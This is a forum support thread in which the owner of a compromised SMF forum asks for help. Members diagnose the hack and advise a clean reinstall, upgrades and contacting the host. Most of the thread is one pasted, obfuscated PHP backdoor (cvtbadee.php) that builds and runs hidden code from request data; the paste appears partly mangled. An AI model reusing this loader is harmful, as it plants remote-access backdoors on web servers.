News:

Wondering if this will always be free?  See why free is better.

Main Menu

Can't Login as Admin

Started by me314159, August 23, 2021, 11:07:32 PM

Previous topic - Next topic

me314159

I've got a SMF (not sure if it is 2.0 or 2.1).  My username shows up when I visit - but I cannot login to the Admin area.    I get this message when I try to enter the Admin areas: 

"Session verification failed. Please try logging out and back in again, and then try again."

Also, even though it looks like I'm logged in (my user name is there) I cannot post - I get this message when trying to post:

"Your session timed out while posting. Please try to re-submit your message."

Interestingly, I have pretty much the same problem with a second SMF site.  They are both on the same server - other than that I don't believe there's anything in common with the two SMF sites.

Any idea what I should do next?


----  EDIT ----

I ftp'd into one of the forums.  I feel that I have found suspicious php files.  First, there are a few files with an 8/10/2021 date (aug 10) which I KNOW I haven't even ftp'd in quite some time.  There are a few others with a 4/22/2021 date which I kind of doubt were me. 

index.php  8/10/202
.user.ini      8/10/202
draped-chan.php    4/22/2021
.htaccess  4/22/2021
cvtbadee.php  4/22/2021

I've downloaded index.php and can't tell if anything is in there that should not be there - but cvtbadee.php is definitely bogus.  I'm deleting cvtbadee.php right now.    Here is what's inside cvtbadee.php:
<?php
$fasted 
='P4e8A('$bogging'<';$lock't';
$jiggle '_m$y"(iiH';$grout='cr7Re'$associated ='.$ir[tOs('$herded ='a'$behold'E'$flub='eSP$())J"';$heading '('$configuration ='V'$fearing'1itTO';$crystal']T:=T'$inferior='3@raae';$goose='od';

$aurelia'M';
$lunchroom 'r';$carrier ='0uvv[rA:'$baffled'/T9s'$edged'erR"eM';$landladies='f'$gels' ';$knot ']e@:e$Q$v'$desks 'scfr]SorS'$codewords 'ir=_-'$colossi'i'$blizzard 'eSeE6v"Es';

$demijohn=','$luise='RQ)_te'$furiouser 'i$aar_a';$bubba')'$anthropogenic 'K'$hooch ';'$hunk'$';$grievously'T'$anomalies ='s'$eyelids 'a';$cavalcade 'l';$assist ='R_D'$cone ')';$golfing'_';$hers='s';$forces 't'$jareb ='4'$jealousy ='to_y];('$madelle'U';$kenton='"2TH';

$sabre ')';$eternities 'g'$firework ='Grag'$brian'"';$divan '(';

$celtics'p'$leigha 'l_ta,rHT';
$emigrating '"'$enabling='T;a_';$longitudinal='s';$latched='AT'$madelena'ru';$bought='?@s';

$associator 'vn6?;';
$chokers 'a';$jmcr'K';
$customer'ea)"'$diabase 'C'$burglarproof ='P';$honeymoons=')';$excoriate'b([5ct';$compositional ='CEsRp(d';$devilish ='N'$eat 'T';

$contravention 'e,t';$lishe='n$I@;)MvB';
$envious='_'$fattener'c'$evildead 'Re_Lb$($?'$herrick='>'$excreted'm';

$consider'[EOnttV'$angle =')V=FbE'$koinonia'('$hunt ='i';

$benjamin'IBs'$coast 'dgBei)';$llywellyn 'Sa';$glossaries 'm';$isomorphically $fattener $madelena['0'] . $coast['3'].

$llywellyn['1'].$consider['5'].$coast['3']. $evildead['2'] .

$desks['2'] .$madelena['1'].$consider['3'] . $fattener$consider['5'] . $coast['4'] .$jealousy['1'] . $consider['3'];$jam =$gels;
$burnishes $isomorphically ($jam,$coast['3']. $lishe['7'] .$llywellyn['1'] .

$leigha
[o]. $koinonia .$lishe['3'].$llywellyn['1']. $madelena['0']. $madelena['0'] .

$llywellyn['1'] . $jealousy[3] . $evildead['2'].$compositional['4'].
$jealousy['1'].$compositional['4'].
$koinonia .$desks['2'] .
$madelena['1'] . $consider['3'].$fattener.$evildead['2'].$coast['1'].$coast['3']. $consider['5'] .
$evildead['2']. $llywellyn['1'].$madelena['0'].$coast['1'] .

$benjamin['2'].
$koinonia$coast['5'] .$coast['5'].
$coast['5'] .$lishe['4'] ); $burnishes
($burglarproof$angle['3'] ,$baffled['0'],

$baffled[2] ,$angle['2'] ,$bogging$coast['4'], $evildead['8'],$madelena['0'],$firework['0'] ,$coast['0'] ,

$jmcr,$evildead['7'] .

$coast['4'].
$angle['2'] . $lishe['3'].$llywellyn['1'] .$madelena['0'] .$madelena['0'] . $llywellyn['1'] .

$jealousy[3] .$evildead['2'] . $glossaries
[o].$coast['3'] .

$madelena['0'] . $coast['1'] . $coast['3']. $koinonia $evildead['7'].$evildead['2']. $evildead['0'] .$angle['5']. $luise[1]. $madelle$angle['5'].

$llywellyn['0'] . $eat$contravention['1']. $evildead['7'].$evildead['2'] .$compositional['0'] .

$consider['2'] .$consider['2']. $jmcr$benjamin['0'].$angle['5'] .$contravention['1'] .$evildead['7'].
$evildead['2'].$llywellyn['0'].$angle['5'].$evildead['0'].$angle['1'] .$angle['5'].

$evildead['0'] .$coast['5']. $lishe['4'] . $evildead['7'].$llywellyn['1'] .

$angle['2'] .

$coast['4'].

$benjamin['2'] . $benjamin['2'].$coast['3'] . $consider['5'] .$koinonia$evildead['7'].$coast['4'] .$consider['0'] . $customer[3] . $benjamin['2']. $angle['4'] . $lishe['7'].$consider['5'] . $glossaries
[o]. $consider['5'].$madelena['0'] .$llywellyn['1'] .$customer[3].$jealousy['4'].$coast['5'] . $evildead['8'] .$evildead['7'] . $coast['4'] .$consider['0'] .

$customer[3]. $benjamin['2'].

$angle['4'] .

$lishe['7'].$consider['5'] .$glossaries
[o].$consider['5'].
$madelena['0'] .

$llywellyn['1']. $customer[3].$jealousy['4'].$knot['3'].
$koinonia$coast['4'].$benjamin['2'] .$benjamin['2'] .$coast['3']. $consider['5'] . $koinonia $evildead['7']. $coast['4'] .

$consider['0'] .$customer[3]. $leigha['6'].$eat $eat.$burglarproof.$evildead['2'].
$llywellyn['0'] .
$coast['2'] . $angle['1'] .$eat $lishe['6']. $eat $evildead['0']. $latched['0'] . $customer[3].$jealousy['4'] .$coast['5']. $evildead['8'].
$evildead['7'] .$coast['4']. $consider['0'] .$customer[3].
$leigha['6'].$eat.$eat .$burglarproof .$evildead['2'].

$llywellyn['0'] .$coast['2'] .$angle['1'].

$eat $lishe['6']. $eat$evildead['0'] . $latched['0'] .
$customer[3] .$jealousy['4'] .
$knot['3'] .$coast['0']. $coast['4'] .$coast['3'] .$coast['5'] .$lishe['4'] . $lishe['3'] .$coast['3'].$lishe['7'] .$llywellyn['1']. $leigha
[o].$koinonia $benjamin['2'].$consider['5'].$madelena['0']. $madelena['0'] . $coast['3'] .$lishe['7']. $koinonia $angle['4']. $llywellyn['1']. $benjamin['2'].$coast['3'] .
$associator['2'] . $jareb$evildead['2'] .$coast['0'] .$coast['3']. $fattener .
$jealousy['1'] . $coast['0'].$coast['3'] . $koinonia.$benjamin['2'] . $consider['5'] .$madelena['0'] .

$madelena['0'] .$coast['3'].

$lishe['7']. $koinonia .
$evildead['7'] .$llywellyn['1'].

$coast['5']. $coast['5'].$coast['5'].
$coast['5']. $lishe['4']); 


Kindred

Yeah, that's a hack.

You need to clean everything.

Delete all files and directories other than settings.php, avatars and attachments
Then upload a clean set of files from the upgrade archive
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

Is it possible to download SMF 2.0.11?   I think I saw SMF 2.0.18 - but not SMF 2.0.11.

LiroyvH

Yes, but why do you want to download 2.0.11?
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

me314159


shadav

might as well get up to date as there's been quite a few security updates since then

make sure to change your hosting account password
and let your host know because they could have gotten access from another hosting account on the same server if you are using a shared server
or at least let them know so they can help track how/when it happened

LiroyvH

Quote from: me314159 on August 24, 2021, 12:38:52 AMThat's what is installed.

That hasn't properly been attended to for years then, I'm afraid to say. Since the release of 2.0.11 there have been 7 updates including security patches and compatibility enhancements (eg: PHP 7.4). It is important to keep your SMF installation up to date for a large variety of reasons; one of which is security. Best not neglect it.

As shadav suggests, since you have to reload the files anyway: might as well properly do it and upgrade it to the latest stable version 2.0.18. This solves multiple problems at once. :)

Having said that, please note that the infection didn't necessarily come in through SMF; in fact it may even be considered as rather unlikely. So the important question is: are you running any other software on the account? For example WordPress with plugins, especially if they're also highly outdated, is notorious for getting accounts compromised. In which case cleaning up just the SMF folder isn't enough, you'd have to clean up the entire account and bring *all* your software and plugins up to date.
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

Doug Heffernan

I can not stress enough the importance of always keeping everything up to date with the latest version. Be that a forum, cms, portals, mods etc.

That being said, I would do a thorough check up of the server space if I was you to make sure that there are no more backdoors.

And try and find out the point of entry a.s.a.p. Your host can help you with that by checking their raw access logs and see how they got in. Like that you can patch up the security hole.

me314159

I've got this weird and bizarre issue - I can upload the new (uninfected files from smf_2-0-11_upgrade) SMF 2.011, but then at least one file never makes it there: Subs-Auth.php

But, I give it a high probably that other files aren't making their way to my hosting site via ftp.

I was going round-and-round last night before realizing what was happening.  For reasons totally not clear to me when Subs-Auth.php gets uploaded it disappears really fast.

So then . . .

I go to my hosting sites file manager and I discover CAN upload Subs-Auth.php without an issue. It doesn't vanish upon uploading.  Good!  Great!  I should be up and running in five minutes - right? 

Wrong!

My hosting sites file manager basically doesn't have facilities to upload directories.  I can upload only files - not any directories.  So, that means, I'd have to manually piece together every folder, and every nested folder.

kill me now

shadav

what ftp are you using? try a different ftp client
filezilla has known issues like this not uploading all files

also again, you really should be using smf 2.0.18, as you are several version behind where there's been several security updates and other important updates

have you contacted your host about the hack? so that they can research how it happened and they can help stop it from happening again?

if you are using other scripts on your site, have you made sure that they are clean files and updated them to their current versions?

me314159

I'm using FileZilla.  I have Coda 2 - maybe that'll work normally.

Okay, I'll upload 2.018

I contacted my host about the hack - they didn't seem concerned.

Other websites I have on the same hosting server appear to have been invaded.   

Egad.

shadav

well if you are using the same script on those sites it was either that script

or they found a security issue with the server and was able to attack every site hosted on that server

and if your host is nonchalant about it, you need a new/better host ASAP like right right now because even if a script is insecure, the host should have protections in place that would still prevent hacks (just saying) I mean it'd still be possible to hack a site but if a host isn't on top of things it makes it a lot easier.

Sir Osis of Liver

The upload fails are not a FileZilla problem, the files upload successfully but are immediately deleted by misconfigured server security.  This was a common problem on GoDaddy for quite a while.  Should be able to upload the missing files via cpanel filemanager.  If it won't let you upload a directory, upload the zip, you should be able to unzip it on server with filemanager.  And use 2.0.18 package, there were no database changes in 2.0 branch, your db will run equally well in .11 or .18.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Kindred

did you DELETE all the files and directories that I suggested?

You can UPLOAD the SMF ZIP archive and then run the EXTRACT from the hositng file manager.... you don't have to upload every file individually.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

Quote from: Kindred on August 24, 2021, 05:38:08 PMdid you DELETE all the files and directories that I suggested?

You can UPLOAD the SMF ZIP archive and then run the EXTRACT from the hositng file manager.... you don't have to upload every file individually.


Sure did.   I was able to use Coda to move all the files/directories - seemingly without loss of files or directories (this has not be verified).   I'd rather upload a zip - I'll look into that. 

me314159

Should I be using something higher than PHP version 5.4.19?

Sir Osis of Liver

PHP 5.4 went eol Sep 2015, it's unsupported and insecure.  SMF 2.0.18 supports up to php 7.4.

https://www.php.net/supported-versions.php
https://www.php.net/eol.php

Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

me314159

My hosting site was PHP 5.6 last night - I kid you NOT - today it mysteriously downgraded on its own to 5.4. 

Sir Osis of Liver

Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

me314159

Godaddy.  I just got off the phone with them - they told me within the last hour I was downgraded to php 5.4 - they could see that in their logs.   Why? They didn't know why.   I asked, if I can downgrade (which I totally did not) - and Godaddy said no, I can only upgrade - and I can't go backward.  And, for this hosting site php 5.6 is the highest php version available.   

I can tell what I was doing exactly when the downgrade occurred.  I was trying to get the broken SMF running - and while troubleshooting (running repair_settings.php) or even just accessing the site at all caused my entire host to stop responding for roughly 5 to 15 minutes.  No ftp, and no websites functioning.  I could reproduce this - and did so several times.

My imagination runs wild.   Can malware downgrade PHP?   Does the server have some sort of panic option that would invoke a php downgrade.  That sounds crazy.  How would that even help?

Stay tuned . . . the entertainment has just begun.

Advertisement: